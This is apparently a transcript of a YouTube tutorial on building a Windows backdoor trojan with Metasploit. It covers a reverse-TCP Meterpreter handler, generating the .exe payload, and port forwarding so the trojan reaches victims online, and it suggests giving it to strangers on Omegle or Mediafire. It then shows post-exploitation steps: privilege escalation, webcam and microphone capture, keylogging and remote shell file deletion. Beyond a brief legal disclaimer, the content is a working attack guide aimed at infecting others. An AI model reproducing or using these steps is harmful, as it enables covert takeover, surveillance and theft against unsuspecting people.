Showing you how to make a backdoor Trojan in Metasploit. So if you have Backtrack or Linux, you already have it installed. But if you don't, then install it, and if you can watch videos on that. Then once you're done installing it, open up terminal and open 2 tabs and make sure you're root. You could use sudo bash. It doesn't matter. So yeah, I'm just doing bash because I like to do that. So then you want to type MSF console to start up the Metasploit framework console. Take note that this Trojan that we're making will only work on Windows 7 and Windows XP. Also, this Trojan will only work on our local area network. So anyone connected to your router can be affected. And you're probably like, oh, that sucks. Well, you can't. That's like, you can still make it so it runs anywhere on the internet, but you're gonna have to do something. You're gonna have to go into your Firefox web browser and type the name of your default gateway, log in, and port forward the port that you put your Trojan on. And then you could run it anywhere in the world. So you can go on Omegle and give it to someone random. But I'm not going to be showing you how to make internet Trojan so it'll run anywhere in the world. You could watch a video on that. But let's get started. Let's make a handler. So basically what a handler is, it'll listen for any incoming connections from the Trojan that we started. So to set up a handler, type use exploit /multi/handler. And now there. So we're in exploit handler. Now set payload Windows/interpreter/reverse_TCP. And once that's done, you want to set lhost space. Now to get your lhost, go into your other tab and type ifconfig. And make sure it's not 127.0.0.1 because that's obviously the local IP. You'll get something like 192.168.0.22 probably, but that's mine. It's like different network IDs. It's not really an IP address. It's just different network IDs. Like, there are probably a million people who have 192.168.0.22. It's not an external IP or anything. So, and then you want to set L port. We're going to use 4444. I think you could use just whatever you want, but I'm just going to use this for this tutorial. Now type exploit. Now you have started a reverse handler on your L host and your L port. Now let's get to actually making a Trojan. So yeah, I think I'm just going to clear my screen. MSF payload Windows/interpreter/reverse_TCP. Oh no, I'm sorry, I made a mistake. Then you want to type lhost equals, and then you know what to put there. Make sure there's an equals though, and then L port, whatever you set it to, but remember I set it to 4444, and then X, and then at arrow, shift press dot, and then /home/Quinlan/ like put it to wherever you want your Trojan to be. But I'm just gonna put mine on my desktop along all these other Trojans that I had fun making. Then what do you want to name it? I'm just gonna make mine named "This is a tutorial." Make sure you have .exe in there. And once you have that, just wait a while, and as you can see, it just popped up there, but it's still loading. And now it should be done any minute here. Not a minute, a second. 4, 5, okay, there we go. Now it is done. And now I'm using Wine. I told you this will work on any computer on your LAN, and if you want it to work somewhere else, like on the internet, say if you want to infect someone on Omegle or Mediafire, you're gonna have to port forward the port. You're gonna have to port forward 4444. But for it to just work on your LAN, all you have to do is click on it on your target computer. Now I don't have a computer to test this on, so I'm just gonna click on it here. I'm using Wine, by the way. And there, as soon as I clicked on it, sending stage 769024 bytes to 192.168.0.22. And now we have a Meterpreter session. Meterpreter is a very powerful tool, and I'm sorry for speaking so fast. But, yeah, let me just show you how powerful it is. Type help, get system, so you can be administrator and stuff, webcam_lifts, webcam_snap, record_mic, screenshot, get desktop, key scan underscore start. Yes, start capturing keystroke so you can see what they're typing, and then dumping it. So let's do that. Key scan underscore start. Okay, now it's started, so let's type stuff down there. And now let's key scan underscore dump. It's probably because I'm using Wine on my own computer that it's not working, but usually it would. But now let me show you how to get CMD access so you can delete files, make files, you know, do everything that you can do in the Windows command line. So type shell, and then you can do whatever you want. Let's do echo hello YouTube, and then let's name it Trojan.txt. There's Trojan.txt. Hello YouTube. Oh, hello YouTube? No, I didn't want to say that. But yeah, you could also remove files by typing del. Yeah, any CMD command you know you could execute in here. And I'm just hacking my computer for a test. You can do it on any computer you want. That's on your LAN. And as I told you, I just can't stress this enough. If you really want to infect something, make sure. I don't want you to get into really illegal troubles with this. But like, if you doing pen testing on a computer that's not on your network, then you're gonna have to port forward your port that you set it on. Like, say if you set it on 4444 like I did, you're gonna have to forward that port. Look up a port forwarding tutorial, or just look up how to I'll just put a link to how to make your Trojan go online. So yeah, that's my video.